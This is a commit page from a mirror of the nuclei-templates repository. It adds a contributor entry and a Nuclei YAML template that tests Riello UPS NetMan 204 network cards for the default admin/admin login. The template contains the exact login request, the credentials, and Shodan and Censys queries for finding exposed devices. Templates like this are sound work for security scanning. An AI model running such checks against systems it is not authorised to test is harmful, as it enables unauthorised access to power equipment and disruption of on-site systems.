mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 07:43:27 +08:00
Add Netman Default Login
Add a template for default login on Riello UPS NetMan 204. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
This commit is contained in:
@@ -1378,6 +1378,16 @@
|
||||
"website": "https://the-empire.systems",
|
||||
"email": ""
|
||||
}
|
||||
},
|
||||
{
|
||||
"author": "mabdullah22",
|
||||
"links": {
|
||||
"github": "https://www.github.com/maabdullah22",
|
||||
"twitter": "https://twitter.com/0x416264",
|
||||
"linkedin": "",
|
||||
"website": "",
|
||||
"email": ""
|
||||
}
|
||||
}
|
||||
|
||||
]
|
||||
|
||||
46
http/default-logins/Riello/netman204-default-login.yaml
Normal file
46
http/default-logins/Riello/netman204-default-login.yaml
Normal file
@@ -0,0 +1,46 @@
|
||||
id: Netman204-default-login
|
||||
|
||||
info:
|
||||
name: Riello UPS NetMan 204 Network Card - Default Login
|
||||
author: mabdullah22
|
||||
severity: high
|
||||
description: Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
|
||||
reference:
|
||||
- https://www.riello-ups.com/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Netman"
|
||||
censys-query: services.http.response.body:"Netman204"
|
||||
tags: default-login,Netman-204-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /cgi-bin/login.cgi?username={{username}}&password={{password}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"response": "ok",'
|
||||
- '"message": "Welcome."'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
Reference in New Issue
Block a user